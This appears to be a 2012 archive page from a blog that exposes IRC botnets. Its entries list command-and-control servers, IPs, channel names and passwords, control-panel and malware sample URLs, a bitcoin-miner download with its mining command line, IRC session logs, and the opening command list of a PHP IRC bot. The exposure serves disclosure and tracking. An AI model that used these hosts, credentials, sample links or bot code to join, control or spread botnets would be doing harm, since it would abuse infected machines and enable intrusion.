Month: April 2012

Botnet found by our anonymous friend this one is mysticals botnet again Server vps.modtech360.info:6664 channel #Boss sample hosting infos: http://whois.domaintools.com/128.204.202.126

Samples are provided from this anonymous guy in this post http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html Resolved : [queerbag.com] To [188.165.212.101] Control panel here http://queerbag.com/jow1z/ u ned user:pass to login 2 exe samples are in this directory http://queerbag.com/bot/ ourbot.exe conects to port 8000 tcp UPDATE: There is another domain name user from this file Resolved : [ugnazi.com] To [176.31.237.84] hereRead more...

This is one of samples uploaded by our anonymous friend in this post http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html Resolved : [aaa1adasadasda444.net] To [217.11.251.173] The control panel is here aaa1adasadasda444.net/admin/image.php credits goes to anonymous guy for proving samples hosting infos: http://whois.domaintools.com/217.11.251.173

This is the second belgian hoster found hosting malwares that’s not good lol Again another great contribution from our anonymous friend wich i called malware because it uses infected machines to do what he does the bitcoin miner is downloaded from here gwassnet.co.cc/NoTouch.exe it connects to svchost2.exe -o http://eu.triplemining.com:8344 -u trap258_gwas -p himom 111 0Read more...

Resolved : [jers1.info] To [208.83.233.195] C&C Server: 208.83.233.195:1889 Server Password: Username: wbunlkj Nickname: n{DE|XPa}wbunlkj Channel: #cpx (Password: nuifkr) Channeltopic: :~pu http://hotfile.com/dl/154232487/a95dd91/27abril.exe 4ad089d45ca43ecc9d99e93215e03f6f ~s -o ~s Downloaded url’s http://199.7.177.220/dl/154232490/3b415ce/jhgfrrr.exe (hotfile.com) hosting infos: http://whois.domaintools.com/208.83.233.195

Resolved : [3.aa.am] To [80.82.66.234] Remote Host Port Number 3.aa.am 9835 Local users: Current Local Users: 710 Max: 1954 Global users: Current Global Users: 710 Max: 1954 NICK {US|XPa|x86}cxtrpuo USER {US|XPa|x86}cxtrpuo 0 0 :{US|XPa|x86}cxtrpuo JOIN #new JOIN #bull Now talking in #new Modes On: [ #new ] [ +sntl 75 ] Joins: {DE|W7a|x86}hssdpli [~DEW7ax8@nig-6B825AA6.superkabel.de] hostingRead more...

The bot used by heckers: <? /* * * #crew@corp. since 2003 * edited by: devil__ <admin@xdevil.org> * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dnsRead more...

Remote Host Port Number 128.204.202.111 6667 PASS nopw NICK n{US|XPa}ubnrkxy USER ubnrkxy 0 0 :ubnrkxy PONG :92C7705D JOIN #ngr# ngrBot {NL|W7p}psvawzp) !v Quits: {NL|W7p}psvawzp [net-217320@E4422491.8D3F578B.324BA75E.IP] (User has been permanently banned from Codeleak (gtfo.)) lol snifers allready in The hecker runing this net (boing7898@rox-F8ED71C3.ip61.fastwebnet.it): Boing * ~#ngr# #codeleak * irc.codeleak.com :Codeleak’s IRC * is away (PlayingRead more...